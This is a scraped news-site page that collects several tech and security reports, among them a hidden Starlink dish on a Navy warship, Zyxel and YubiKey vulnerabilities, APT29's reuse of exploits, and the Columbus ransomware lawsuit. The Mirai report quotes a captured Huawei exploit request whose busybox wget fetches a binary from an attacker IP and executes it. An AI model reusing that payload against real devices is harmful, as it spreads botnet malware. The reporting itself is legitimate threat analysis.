Security

after-seeing-wi-fi-network-named-“stinky,”-navy-found-hidden-starlink-dish-on-us-warship

After seeing Wi-Fi network named “STINKY,” Navy found hidden Starlink dish on US warship

I need that sweet, sweet wi-fi —

To be fair, it’s hard to live without Wi-Fi.

A photo of the USS Manchester.

Enlarge / The USS Manchester. Just the spot for a Starlink dish.

Department of Defense

It’s no secret that government IT can be a huge bummer. The records retention! The security! So government workers occasionally take IT into their own hands with creative but, err, unauthorized solutions.

For instance, a former US Ambassador to Kenya in 2015 got in trouble after working out of an embassy compound bathroom—the only place where he could use his personal computer (!) to access an unsecured network (!!) that let him log in to Gmail (!!!), where he did much of his official business—rules and security policies be damned.

Still, the ambassador had nothing on senior enlisted crew members of the littoral combat ship USS Manchester, who didn’t like the Navy’s restriction of onboard Internet access. In 2023, they decided that the best way to deal with the problem was to secretly bolt a Starlink terminal to the “O-5 level weatherdeck” of a US warship.

They called the resulting Wi-Fi network “STINKY”—and when officers on the ship heard rumors and began asking questions, the leader of the scheme brazenly lied about it. Then, when exposed, she went so far as to make up fake Starlink usage reports suggesting that the system had only been accessed while in port, where cybersecurity and espionage concerns were lower.

Rather unsurprisingly, the story ends badly, with a full-on Navy investigation and court-martial. Still, for half a year, life aboard the Manchester must have been one hell of a ride.

Enlarge / A photo included in the official Navy investigation report, showing the location of the hidden Starlink terminal on the USS Manchester.

DOD (through Navy Times)

One stinky solution

The Navy Times has all the new and gory details, and you should read their account, because they went to the trouble of using the Freedom of Information Act (FOIA) to uncover the background of this strange story. But the basics are simple enough: People are used to Internet access. They want it, even (perhaps especially!) when at sea on sensitive naval missions to Asia, where concern over Chinese surveillance and hacking runs hot.

So, in early 2023, while in the US preparing for a deployment, Command Senior Chief Grisel Marrero—the enlisted shipboard leader—led a scheme to buy a Starlink for $2,800 and to install it inconspicuously on the ship’s deck. The system was only for use by chiefs—not by officers or by most enlisted personnel—and a Navy investigation later revealed that at least 15 chiefs were in on the plan.

The Navy Times describes how Starlink was installed:

The Starlink dish was installed on the Manchester’s O-5 level weatherdeck during a “blanket” aloft period, which requires a sailor to hang high above or over the side of the ship.

During a “blanket” aloft, duties are not documented in the deck logs or the officer of the deck logs, according to the investigation.

It’s unclear who harnessed up and actually installed the system for Marrero due to redactions in the publicly released copy of the probe, but records show Marrero powered up the system the night before the ship got underway to the West Pacific waters of U.S. 7th Fleet.

This was all extremely risky, and the chiefs don’t appear to have taken amazing security precautions once everything was installed. For one thing, they called the network “STINKY.” For another, they were soon adding more gear around the ship, which was bound to raise further questions. The chiefs found that the Wi-Fi signal coming off the Starlink satellite transceiver couldn’t cover the entire ship, so during a stop in Pearl Harbor, they bought “signal repeaters and cable” to extend coverage.

Sailors on the ship then began finding the STINKY network and asking questions about it. Some of these questions came to Marrero directly, but she denied knowing anything about the network… and then privately changed its Wi-Fi name to “another moniker that looked like a wireless printer—even though no such general-use wireless printers were present on the ship, the investigation found.”

Marrero even went so far as to remove questions about the network from the commanding officer’s “suggestion box” aboard ship to avoid detection.

Finding the stench

Ship officers heard the scuttlebutt about STINKY, of course, and they began asking questions and doing inspections, but they never found the concealed device. On August 18, though, a civilian worker from the Naval Information Warfare Center was installing an authorized SpaceX “Starshield” device and came across the unauthorized SpaceX device hidden on the weatherdeck.

Marrero’s attempt to create fake data showing that the system had only been used in port then failed spectacularly due to the “poorly doctored” statements she submitted. At that point, the game was up, and Navy investigators looked into the whole situation.

All of the chiefs who used, paid for, or even knew about the system without disclosing it were given “administrative nonjudicial punishment at commodore’s mast,” said Navy Times.

Marrero herself was relieved of her post last year, and she pled guilty during a court-martial this spring.

So there you go, kids: two object lessons in poor decision-making. Whether working from an embassy bathroom or the deck of a littoral combat ship, if you’re a government employee, think twice before giving in to the sweet temptation of unsecured, unauthorized wireless Internet access.

Update, Sept. 5, 3: 30pm: A reader has claimed that the default Starlink SSID is actually… “STINKY.” This seemed almost impossible to believe, but Elon Musk in fact tweeted about it in 2022, Redditors have reported it in the wild, and back in 2022 (thanks, Wayback Machine), the official Starlink FAQ said that the device’s “network name will appear as ‘STARLINK’ or ‘STINKY’ in device WiFi settings.” (A check of the current Starlink FAQ, however, shows that the default network name now is merely “STARLINK.”)

In other words, not only was this asinine conspiracy a terrible OPSEC idea, but the ringleaders didn’t even change the default Wi-Fi name until they started getting questions about it. Yikes.

2022 Twitter thread announcing that

2022 Twitter thread announcing that “STINKY” would be the default SSID for Starlink.

After seeing Wi-Fi network named “STINKY,” Navy found hidden Starlink dish on US warship Read More »

zyxel-warns-of-vulnerabilities-in-a-wide-range-of-its-products

Zyxel warns of vulnerabilities in a wide range of its products

GET YER PATCHING ON —

Most serious vulnerabilities carry severity ratings of 9.8 and 8.1 out of a possible 10.

Zyxel warns of vulnerabilities in a wide range of its products

Getty Images

Networking hardware-maker Zyxel is warning of nearly a dozen vulnerabilities in a wide array of its products. If left unpatched, some of them could enable the complete takeover of the devices, which can be targeted as an initial point of entry into large networks.

The most serious vulnerability, tracked as CVE-2024-7261, can be exploited to “allow an unauthenticated attacker to execute OS commands by sending a crafted cookie to a vulnerable device,” Zyxel warned. The flaw, with a severity rating of 9.8 out of 10, stems from the “improper neutralization of special elements in the parameter ‘host’ in the CGI program” of vulnerable access points and security routers. Nearly 30 Zyxel devices are affected. As is the case with the remaining vulnerabilities in this post, Zyxel is urging customers to patch them as soon as possible.

But wait… there’s more

The hardware manufacturer warned of seven additional vulnerabilities affecting firewall series including the ATP, USG-FLEX, and USG FLEX 50(W)/USG20(W)-VPN. The vulnerabilities carry severity ratings ranging from 4.9 to 8.1. The vulnerabilities are:

CVE-2024-6343: a buffer overflow vulnerability in the CGI program that could allow an authenticated attacker with administrator privileges to wage denial-of-service by sending crafted HTTP requests.

CVE-2024-7203: A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to run OS commands by executing a crafted CLI command.

CVE-2024-42057: A command injection vulnerability in the IPSec VPN feature that could allow an unauthenticated attacker to run OS commands by sending a crafted username. The attack would be successful only if the device was configured in User-Based-PSK authentication mode and a valid user with a long username exceeding 28 characters exists.

CVE-2024-42058: A null pointer dereference vulnerability in some firewall versions that could allow an unauthenticated attacker to wage DoS attacks by sending crafted packets.

CVE-2024-42059: A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to run OS commands on an affected device by uploading a crafted compressed language file via FTP.

CVE-2024-42060: A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to execute OS commands by uploading a crafted internal user agreement file to the vulnerable device.

CVE-2024-42061: A reflected cross-site scripting vulnerability in the CGI program “dynamic_script.cgi” that could allow an attacker to trick a user into visiting a crafted URL with the XSS payload. The attacker could obtain browser-based information if the malicious script is executed on the victim’s browser.

The remaining vulnerability is CVE-2024-5412 with a severity rating of 7.5. It resides in 50 Zyxel product models, including a range of customer premises equipment, fiber optical network terminals, and security routers. A buffer overflow vulnerability in the “libclinkc” library of affected devices could allow an unauthenticated attacker to wage denial-of-service attacks by sending a crafted HTTP request.

In recent years, vulnerabilities in Zyxel devices have regularly come under active attack. Many of the patches are available for download at links listed in the advisories. In a small number of cases, the patches are available through the cloud. Patches for some products are available only by privately contacting the company’s support team.

Zyxel warns of vulnerabilities in a wide range of its products Read More »

metal-bats-have-pluses-for-young-players,-but-in-the-end-it-comes-down-to-skill

Metal bats have pluses for young players, but in the end it comes down to skill

four different kinds of wood and metal bats laid flat on baseball diamond grass

Enlarge / Washington State University scientists conducted batting cage tests of wood and metal bats with young players.

There’s long been a debate in baseball circles about the respective benefits and drawbacks of using wood bats versus metal bats. However, there are relatively few scientific studies on the topic that focus specifically on young athletes, who are most likely to use metal bats. Scientists at Washington State University (WSU) conducted their own tests of wood and metal bats with young players. They found that while there are indeed performance differences between wooden and metal bats, a batter’s skill is still the biggest factor affecting how fast the ball comes off the bat, according to a new paper published in the Journal of Sports Engineering and Technology.

According to physicist and acoustician Daniel Russell of Penn State University—who was not involved in the study but has a long-standing interest in the physics of baseball ever since his faculty days at Kettering University in Michigan—metal bats were first introduced in 1974 and soon dominated NCAA college baseball, youth baseball, and adult amateur softball. Those programs liked the metal bats because they were less likely to break than traditional wooden bats, reducing costs.

Players liked them because it can be easier to control metal bats and swing faster, as the center of mass is closer to the balance point in the bat’s handle, resulting in a lower moment of inertia (or “swing weight”). A faster swing doesn’t mean that a hit ball will travel faster, however, since the lower moment of inertia is countered by a decreased collision efficiency. Metal bats are also more forgiving if players happen to hit the ball away from the proverbial “sweet spot” of the bat. (The definition of the sweet spot is a bit fuzzy because it is sometimes defined in different ways, but it’s commonly understood to be the area on the bat’s barrel that results in the highest batted ball speeds.)

“There’s more of a penalty when you’re not on the sweet spot with wood bats than with the other metal bats,” said Lloyd Smith, director of WSU’s Sport Science Laboratory and a co-author of the latest study. “[And] wood is still heavy. Part of baseball is hitting the ball far, but the other part is just hitting the ball. If you have a heavy bat, you’re going to have a harder time making contact because it’s harder to control.”

Metal bats may also improve performance via a kind of “trampoline effect.” Metal bats are hollow, while wood bats are solid. When a ball hits a wood bat, the bat barrel compresses by as much as 75 percent, such that internal friction forces decrease the initial energy by as much as 75 percent. A metal bat barrel behaves more like a spring when it compresses in response to a ball’s impact, so there is much less energy loss. Based on his own research back in 2004, Russell has found that improved performance of metal bats is linked to the frequency of the barrel’s mode of vibration, aka the “hoop mode.” (Bats with the lowest hoop frequency will have the highest performance.)

Metal bats have pluses for young players, but in the end it comes down to skill Read More »

yubikeys-are-vulnerable-to-cloning-attacks-thanks-to-newly-discovered-side-channel

YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel

ATTACK OF THE CLONES —

Sophisticated attack breaks security assurances of the most popular FIDO key.

YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel

Yubico

The YubiKey 5, the most widely used hardware token for two-factor authentication based on the FIDO standard, contains a cryptographic flaw that makes the finger-size device vulnerable to cloning when an attacker gains brief physical access to it, researchers said Tuesday.

The cryptographic flaw, known as a side channel, resides in a small microcontroller used in a large number of other authentication devices, including smartcards used in banking, electronic passports, and the accessing of secure areas. While the researchers have confirmed all YubiKey 5 series models can be cloned, they haven’t tested other devices using the microcontroller, such as the SLE78 made by Infineon and successor microcontrollers known as the Infineon Optiga Trust M and the Infineon Optiga TPM. The researchers suspect that any device using any of these three microcontrollers and the Infineon cryptographic library contains the same vulnerability.

Patching not possible

YubiKey-maker Yubico issued an advisory in coordination with a detailed disclosure report from NinjaLab, the security firm that reverse-engineered the YubiKey 5 series and devised the cloning attack. All YubiKeys running firmware prior to version 5.7—which was released in May and replaces the Infineon cryptolibrary with a custom one—are vulnerable. Updating key firmware on the YubiKey isn’t possible. That leaves all affected YubiKeys permanently vulnerable.

“An attacker could exploit this issue as part of a sophisticated and targeted attack to recover affected private keys,” the advisory confirmed. “The attacker would need physical possession of the YubiKey, Security Key, or YubiHSM, knowledge of the accounts they want to target and specialized equipment to perform the necessary attack. Depending on the use case, the attacker may also require additional knowledge including username, PIN, account password, or authentication key.”

Side channels are the result of clues left in physical manifestations such as electromagnetic emanations, data caches, or the time required to complete a task that leaks cryptographic secrets. In this case, the side channel is the amount of time taken during a mathematical calculation known as a modular inversion. The Infineon cryptolibrary failed to implement a common side-channel defense known as constant time as it performs modular inversion operations involving the Elliptic Curve Digital Signature Algorithm. Constant time ensures the time sensitive cryptographic operations execute is uniform rather than variable depending on the specific keys.

More precisely, the side channel is located in the Infineon implementation of the Extended Euclidean Algorithm, a method for, among other things, computing the modular inverse. By using an oscilloscope to measure the electromagnetic radiation while the token is authenticating itself, the researchers can detect tiny execution time differences that reveal a token’s ephemeral ECDSA key, also known as a nonce. Further analysis allows the researchers to extract the secret ECDSA key that underpins the entire security of the token.

In Tuesday’s report, NinjaLab co-founder Thomas Roche wrote:

In the present work, NinjaLab unveils a new side-channel vulnerability in the ECDSA implementation of Infineon 9 on any security microcontroller family of the manufacturer.This vulnerability lies in the ECDSA ephemeral key (or nonce) modular inversion, and, more precisely, in the Infineon implementation of the Extended Euclidean Algorithm (EEA for short). To our knowledge, this is the first time an implementation of the EEA is shown to be vulnerable to side-channel analysis (contrarily to the EEA binary version). The exploitation of this vulnerability is demonstrated through realistic experiments and we show that an adversary only needs to have access to the device for a few minutes. The offline phase took us about 24 hours; with more engineering work in the attack development, it would take less than one hour.

After a long phase of understanding Infineon implementation through side-channel analysis on a Feitian 10 open JavaCard smartcard, the attack is tested on a YubiKey 5Ci, a FIDO hardware token from Yubico. All YubiKey 5 Series (before the firmware update 5.7 11 of May 6th, 2024) are affected by the attack. In fact all products relying on the ECDSA of Infineon cryptographic library running on an Infineon security microcontroller are affected by the attack. We estimate that the vulnerability exists for more than 14 years in Infineon top secure chips. These chips and the vulnerable part of the cryptographic library went through about 80 CC certification evaluations of level AVA VAN 4 (for TPMs) or AVA VAN 5 (for the others) from 2010 to 2024 (and a bit less than 30 certificate maintenances).

YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel Read More »

city-of-columbus-sues-man-after-he-discloses-severity-of-ransomware-attack

City of Columbus sues man after he discloses severity of ransomware attack

WHISTLEBLOWER IN LEGAL CROSSHAIRS —

Mayor said data was unusable to criminals; researcher proved otherwise.

A ransom note is plastered across a laptop monitor.

A judge in Ohio has issued a temporary restraining order against a security researcher who presented evidence that a recent ransomware attack on the city of Columbus scooped up reams of sensitive personal information, contradicting claims made by city officials.

The order, issued by a judge in Ohio’s Franklin County, came after the city of Columbus fell victim to a ransomware attack on July 18 that siphoned 6.5 terabytes of the city’s data. A ransomware group known as Rhysida took credit for the attack and offered to auction off the data with a starting bid of about $1.7 million in bitcoin. On August 8, after the auction failed to find a bidder, Rhysida released what it said was about 45 percent of the stolen data on the group’s dark web site, which is accessible to anyone with a TOR browser.

Dark web not readily available to public—really?

Columbus Mayor Andrew Ginther said on August 13 that a “breakthrough” in the city’s forensic investigation of the breach found that the sensitive files Rhysida obtained were either encrypted or corrupted, making them “unusable” to the thieves. Ginther went on to say the data’s lack of integrity was likely the reason the ransomware group had been unable to auction off the data.

Shortly after Ginther made his remarks, security researcher David Leroy Ross contacted local news outlets and presented evidence that showed the data Rhysida published was fully intact and contained highly sensitive information regarding city employees and residents. Ross, who uses the alias Connor Goodwolf, presented screenshots and other data that showed the files Rhysida had posted included names from domestic violence cases and Social Security numbers for police officers and crime victims. Some of the data spanned years.

On Thursday, the city of Columbus sued Ross for alleged damages for criminal acts, invasion of privacy, negligence, and civil conversion. The lawsuit claimed that downloading documents from a dark web site run by ransomware attackers amounted to him “interacting” with them and required special expertise and tools. The suit went on to challenge Ross alerting reporters to the information, which ii claimed would not be easily obtained by others.

“Only individuals willing to navigate and interact with the criminal element on the dark web, who also have the computer expertise and tools necessary to download data from the dark web, would be able to do so,” city attorneys wrote. “The dark web-posted data is not readily available for public consumption. Defendant is making it so.”

The same day, a Franklin County judge granted the city’s motion for a temporary restraining order against Ross. It bars the researcher “from accessing, and/or downloading, and/or disseminating” any city files that were posted to the dark web. The motion was made and granted “ex parte,” meaning in secret before Ross was informed of it or had an opportunity to present his case.

In a press conference Thursday, Columbus City Attorney Zach Klein defended his decision to sue Ross and obtain the restraining order.

“This is not about freedom of speech or whistleblowing,” he said. “This is about the downloading and disclosure of stolen criminal investigatory records. This effect is to get [Ross] to stop downloading and disclosing stolen criminal records to protect public safety.”

The Columbus city attorney’s office didn’t respond to questions sent by email. It did provide the following statement:

The lawsuit filed by the City of Columbus pertains to stolen data that Mr. Ross downloaded from the dark web to his own, local device and disseminated to the media. In fact, several outlets used the stolen data provided by Ross to go door-to-door and contact individuals using names and addresses contained within the stolen data. As has now been extensively reported, Mr. Ross also showed multiple news outlets stolen, confidential data belonging to the City which he claims reveal the identities of undercover police officers and crime victims as well as evidence from active criminal investigations. Sharing this stolen data threatens public safety and the integrity of the investigations. The temporary restraining order granted by the Court prohibits Mr. Ross from disseminating any of the City’s stolen data. Mr. Ross is still free to speak about the cyber incident and even describe what kind of data is on the dark web—he just cannot disseminate that data.

Attempts to reach Ross for comment were unsuccessful. Email sent to the Columbus mayor’s office went unanswered.

A screenshot showing the Rhysida dark web site.

Enlarge / A screenshot showing the Rhysida dark web site.

As shown above in the screenshot of the Rhysida dark web site on Friday morning, the sensitive data remains available to anyone who looks for it. Friday’s order may bar Ross from accessing the data or disseminating it to reporters, but it has no effect on those who plan to use the data for malicious purposes.

City of Columbus sues man after he discloses severity of ransomware attack Read More »

commercial-spyware-vendor-exploits-used-by-kremlin-backed-hackers,-google-says

Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says

MERCHANTS OF HACKING —

Findings undercut pledges of NSO Group and Intgellexa their wares won’t be abused.

Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says

Getty Images

Critics of spyware and exploit sellers have long warned that the advanced hacking sold by commercial surveillance vendors (CSVs) represents a worldwide danger because they inevitably find their way into the hands of malicious parties, even when the CSVs promise they will be used only to target known criminals. On Thursday, Google analysts presented evidence bolstering the critique after finding that spies working on behalf of the Kremlin used exploits that are “identical or strikingly similar” to those sold by spyware makers Intellexa and NSO Group.

The hacking outfit, tracked under names including APT29, Cozy Bear, and Midnight Blizzard, is widely assessed to work on behalf of Russia’s Foreign Intelligence Service, or the SVR. Researchers with Google’s Threat Analysis Group, which tracks nation-state hacking, said Thursday that they observed APT29 using exploits identical or closely identical to those first used by commercial exploit sellers NSO Group of Israel and Intellexa of Ireland. In both cases, the Commercial Surveillance Vendors’ exploits were first used as zero-days, meaning when the vulnerabilities weren’t publicly known and no patch was available.

Identical or strikingly similar

Once patches became available for the vulnerabilities, TAG said, APT29 used the exploits in watering hole attacks, which infect targets by surreptitiously planting exploits on sites they’re known to frequent. TAG said APT29 used the exploits as n-days, which target vulnerabilities that have recently been fixed but not yet widely installed by users.

“In each iteration of the watering hole campaigns, the attackers used exploits that were identical or strikingly similar to exploits from CSVs, Intellexa, and NSO Group,” TAG’s Clement Lecigne wrote. “We do not know how the attackers acquired these exploits. What is clear is that APT actors are using n-day exploits that were originally used as 0-days by CSVs.”

In one case, Lecigne said, TAG observed APT29 compromising the Mongolian government sites mfa.gov[.]mn and cabinet.gov[.]mn and planting a link that loaded code exploiting CVE-2023-41993, a critical flaw in the WebKit browser engine. The Russian operatives used the vulnerability, loaded onto the sites in November, to steal browser cookies for accessing online accounts of targets they hoped to compromise. The Google analyst said that the APT29 exploit “used the exact same trigger” as an exploit Intellexa used in September 2023, before CVE-2023-41993 had been fixed.

Lucigne provided the following image showing a side-by-side comparison of the code used in each attack.

A side-by-side comparison of code used by APT29 in November 2023 and Intellexa in September of that year.

Enlarge / A side-by-side comparison of code used by APT29 in November 2023 and Intellexa in September of that year.

Google TAG

APT29 used the same exploit again in February of this year in a watering hole attack on the Mongolian government website mga.gov[.]mn.

In July 2024, APT29 planted a new cookie-stealing attack on mga.gov[.]me. It exploited CVE-2024-5274 and CVE-2024-4671, two n-day vulnerabilities in Google Chrome. Lucigne said APT29’s CVE-2024-5274 exploit was a slightly modified version of that NSO Group used in May 2024 when it was still a zero-day. The exploit for CVE-2024-4671, meanwhile, contained many similarities to CVE-2021-37973, an exploit Intellexa had previously used to evade Chrome sandbox protections.

The timeline of the attacks is illustrated below:

Google TAG

As noted earlier, it’s unclear how APT29 would have obtained the exploits. Possibilities include: malicious insiders at the CSVs or brokers who worked with the CSVs, hacks that stole the code, or outright purchases. Both companies defend their business by promising to sell exploits only to governments of countries deemed to have good world standing. The evidence unearthed by TAG suggests that despite those assurances, the exploits are finding their way into the hands of government-backed hacking groups.

“While we are uncertain how suspected APT29 actors acquired these exploits, our research underscores the extent to which exploits first developed by the commercial surveillance industry are proliferated to dangerous threat actors,” Lucigne wrote.

Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says Read More »

unpatchable-0-day-in-surveillance-cam-is-being-exploited-to-install-mirai

Unpatchable 0-day in surveillance cam is being exploited to install Mirai

MIRAI STRIKES AGAIN —

Vulnerability is easy to exploit and allows attackers to remotely execute commands.

The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

Malicious hackers are exploiting a critical vulnerability in a widely used security camera to spread Mirai, a family of malware that wrangles infected Internet of Things devices into large networks for use in attacks that take down websites and other Internet-connected devices.

The attacks target the AVM1203, a surveillance device from Taiwan-based manufacturer AVTECH, network security provider Akamai said Wednesday. Unknown attackers have been exploiting a 5-year-old vulnerability since March. The zero-day vulnerability, tracked as CVE-2024-7029, is easy to exploit and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day.

That time a ragtag army shook the Internet

Akamai said that the attackers are exploiting the vulnerability so they can install a variant of Mirai, which arrived in September 2016 when a botnet of infected devices took down cybersecurity news site Krebs on Security. Mirai contained functionality that allowed a ragtag army of compromised webcams, routers, and other types of IoT devices to wage distributed denial-of-service attacks of record-setting sizes. In the weeks that followed, the Mirai botnet delivered similar attacks on Internet service providers and other targets. One such attack, against dynamic domain name provider Dyn paralyzed vast swaths of the Internet.

Complicating attempts to contain Mirai, its creators released the malware to the public, a move that allowed virtually anyone to create their own botnets that delivered DDoSes of once-unimaginable size.

Kyle Lefton, a security researcher with Akamai’s Security Intelligence and Response Team, said in an email that it has observed the threat actor behind the attacks perform DDoS attacks against “various organizations,” which he didn’t name or describe further. So far, the team hasn’t seen any indication the threat actors are monitoring video feeds or using the infected cameras for other purposes.

Akamai detected the activity using a “honeypot” of devices that mimic the cameras on the open Internet to observe any attacks that target them. The technique doesn’t allow the researchers to measure the botnet’s size. The US Cybersecurity and Infrastructure Security Agency warned of the vulnerability earlier this month.

The technique, however, has allowed Akamai to capture the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019 when exploit code became public. The zero-day resides in the “brightness argument in the ‘action=’ parameter” and allows for command injection, researchers wrote. The zero-day, discovered by Akamai researcher Aline Eliovich, wasn’t formally recognized until this month, with the publishing of CVE-2024-7029.

Wednesday’s post went on to say:

How does it work?

This vulnerability was originally discovered by examining our honeypot logs. Figure 1 shows the decoded URL for clarity.

Decoded payload

Fig. 1: Decoded payload body of the exploit attempts

Enlarge / Fig. 1: Decoded payload body of the exploit attempts

Akamai

Fig. 1: Decoded payload body of the exploit attempts

The vulnerability lies in the brightness function within the file /cgi-bin/supervisor/Factory.cgi (Figure 2).

Fig. 2: PoC of the exploit

Enlarge / Fig. 2: PoC of the exploit

Akamai

What could happen?

In the exploit examples we observed, essentially what happened is this: The exploit of this vulnerability allows an attacker to execute remote code on a target system.

Figure 3 is an example of a threat actor exploiting this flaw to download and run a JavaScript file to fetch and load their main malware payload. Similar to many other botnets, this one is also spreading a variant of Mirai malware to its targets.

Fig. 3: Strings from the JavaScript downloader

Enlarge / Fig. 3: Strings from the JavaScript downloader

Akamai

In this instance, the botnet is likely using the Corona Mirai variant, which has been referenced by other vendors as early as 2020 in relation to the COVID-19 virus.

Upon execution, the malware connects to a large number of hosts through Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).

Fig. 4: Execution of malware showing output to console

Enlarge / Fig. 4: Execution of malware showing output to console

Akamai

Static analysis of the strings in the malware samples shows targeting of the path /ctrlt/DeviceUpgrade_1 in an attempt to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1    Content-Length: 430    Connection: keep-alive    Accept: */Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="https://arstechnica.com/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"      $(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)  

The botnet also targeted several other vulnerabilities including a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have observed these vulnerabilities exploited in the wild several times, and they continue to be successful.

Given that this camera model is no longer supported, the best course of action for anyone using one is to replace it. As with all Internet-connected devices, IoT devices should never be accessible using the default credentials that shipped with them.

Unpatchable 0-day in surveillance cam is being exploited to install Mirai Read More »

shocker:-french-make-surprise-arrest-of-telegram-founder-at-paris-airport

Shocker: French make surprise arrest of Telegram founder at Paris airport

quelle surprise —

Lack of moderation on Telegram claimed to be reason for arrest.

Pavel Durov, Telegram founder and former CEO of Vkontakte, in happier (and younger) days.

Pavel Durov, Telegram founder and former CEO of Vkontakte, in happier (and younger) days.

Late this afternoon at a Parisian airport, French authorities detained Pavel Durov, the founder of the Telegram messaging/publication service. They are allegedly planning to hit him tomorrow with serious charges related to abetting terrorism, fraud, money laundering, and crimes against children, all of it apparently stemming from a near-total lack of moderation on Telegram. According to French authorities, thanks to its encryption and support for crypto, Telegram has become the new top tool for organized crime.

The French outlet TF1 had the news first from sources within the investigation. (Reuters and CNN have since run stories as well.) Their source said, “Pavel Durov will definitely end up in pretrial detention. On his platform, he allowed an incalculable number of offenses and crimes to be committed, which he does nothing to moderate nor does he cooperate.”

Durov is a 39-year-old who gained a fortune by building VKontakte, a Russian version of Facebook, before being forced out of his company by the Kremlin. He left Russia and went on to start Telegram, which became widely popular, especially in Europe. He was arrested today when his private plane flew from Azerbaijan to Paris’s Le Bourget Airport.

Telegram has become a crucial news outlet for Russians, as it is one of the few uncensored ways to hear non-Kremlin propaganda from within Russia. It has also become the top outlet for nationalistic Russian “milbloggers” writing about the Ukraine war. Durov’s arrest has already led to outright panic among many of them, in part due to secrets it might reveal—but also because it is commonly used by Russian forces to communicate.

As Rob Lee, a senior fellow at the Foreign Policy Research Institute, noted tonight, “A popular Russian channel says that Telegram is also used by Russian forces to communicate, and that if Western intelligence services gain access to it, they could obtain sensitive information about the Russian military.”

Right wing and crypto influencers are likewise angry over the arrest, writing things like, “This is a serious attack on freedom. Today, they target an app that promotes liberty tomorrow, they will go after DeFi. If you claim to support crypto, you must show your support #FreeDurov it’s time for digital resistance.”

Durov appears to be an old-school cyber-libertarian who believes in privacy and encryption. His arrest will certainly resonate in America, which has seen a similar debate over how much online services should cooperate with law enforcement. The FBI, for instance, has occasionally warned that end-to-end encryption will result in a “going dark” problem in which crime simply disappears from their view, and the US has seen repeated attempts to legislate backdoors into encryption systems. Those have all been defeated, however, and civil liberties advocates and techies generally note that creating backdoors makes such systems fundamentally insecure. The global debate over crime, encryption, civil liberties, and messaging apps is sure to heat up with Durov’s arrest.

Shocker: French make surprise arrest of Telegram founder at Paris airport Read More »

microsoft-to-host-security-summit-after-crowdstrike-disaster

Microsoft to host security summit after CrowdStrike disaster

Bugging out —

Redmond wants to improve the resilience of Windows to buggy software.

Photo of a Windows BSOD

Microsoft is stepping up its plans to make Windows more resilient to buggy software after a botched CrowdStrike update took down millions of PCs and servers in a global IT outage.

The tech giant has in the past month intensified talks with partners about adapting the security procedures around its operating system to better withstand the kind of software error that crashed 8.5 million Windows devices on July 19.

Critics say that any changes by Microsoft would amount to a concession of shortcomings in Windows’ handling of third-party security software that could have been addressed sooner.

Yet they would also prove controversial among security vendors that would have to make radical changes to their products, and force many Microsoft customers to adapt their software.

Last month’s outages—which are estimated to have caused billions of dollars in damages after grounding thousands of flights and disrupting hospital appointments worldwide—heightened scrutiny from regulators and business leaders over the extent of access that third-party software vendors have to the core, or kernel, of Windows operating systems.

Microsoft will host a summit next month for government representatives and cyber security companies, including CrowdStrike, to “discuss concrete steps we will all take to improve security and resiliency for our joint customers,” Microsoft said on Friday.

The gathering will take place on September 10 at Microsoft’s headquarters near Seattle, it said in a blog post.

Bugs in the kernel can quickly crash an entire operating system, triggering the millions of “blue screens of death” that appeared around the globe after CrowdStrike’s faulty software update was sent out to clients’ devices.

Microsoft told the Financial Times it was considering several options to make its systems more stable and had not ruled out completely blocking access to the Windows kernel—an option some rivals fear would put their software at a disadvantage to the company’s internal security product, Microsoft Defender.

“All of the competitors are concerned that [Microsoft] will use this to prefer their own products over third-party alternatives,” said Ryan Kalember, head of cyber security strategy at Proofpoint.

Microsoft may also demand new testing procedures from cyber security vendors rather than adapting the Windows system itself.

Apple, which was not hit by the outages, blocks all third-party providers from accessing the kernel of its MacOS operating system, forcing them to operate in the more limited “user-mode.”

Microsoft has previously said it could not do the same, after coming to an understanding with the European Commission in 2009 that it would give third parties the same access to its systems as that for Microsoft Defender.

Some experts said, however, that this voluntary commitment to the EU had not tied Microsoft’s hands in the way it claimed, arguing that the company had always been free to make the changes now under consideration.

“These are technical decisions of Microsoft that were not part of [the arrangement],” said Thomas Graf, a partner at Cleary Gottlieb in Brussels who was involved in the case.

“The text [of the understanding] does not require them to give access to the kernel,” added AJ Grotto, a former senior director for cyber security policy at the White House.

Grotto said Microsoft shared some of the blame for the July disruption since the outages would not have been possible without its decision to allow access to the kernel.

Nevertheless, while it might boost a system’s resilience, blocking kernel access could also bring “real trade-offs” for the compatibility with other software that had made Windows so popular among business customers, Forrester analyst Allie Mellen said.

“That would be a fundamental shift for Microsoft’s philosophy and business model,” she added.

Operating exclusively outside the kernel may lower the risk of triggering mass outages but it was also “very limiting” for security vendors and could make their products “less effective” against hackers, Mellen added.

Operating within the kernel gave security companies more information about potential threats and enabled their defensive tools to activate before malware could take hold, she added.

An alternative option could be to replicate the model used by the open-source operating system Linux, which uses a filtering mechanism that creates a segregated environment within the kernel in which software, including cyber defense tools, can run.

But the complexity of overhauling how other security software works with Windows means that any changes will be hard for regulators to police and Microsoft will have strong incentives to favor its own products, rivals said.

It “sounds good on paper, but the devil is in the details,” said Matthew Prince, chief executive of digital services group Cloudflare.

© 2024 The Financial Times Ltd. All rights reserved Not to be redistributed, copied, or modified in any way.

Microsoft to host security summit after CrowdStrike disaster Read More »

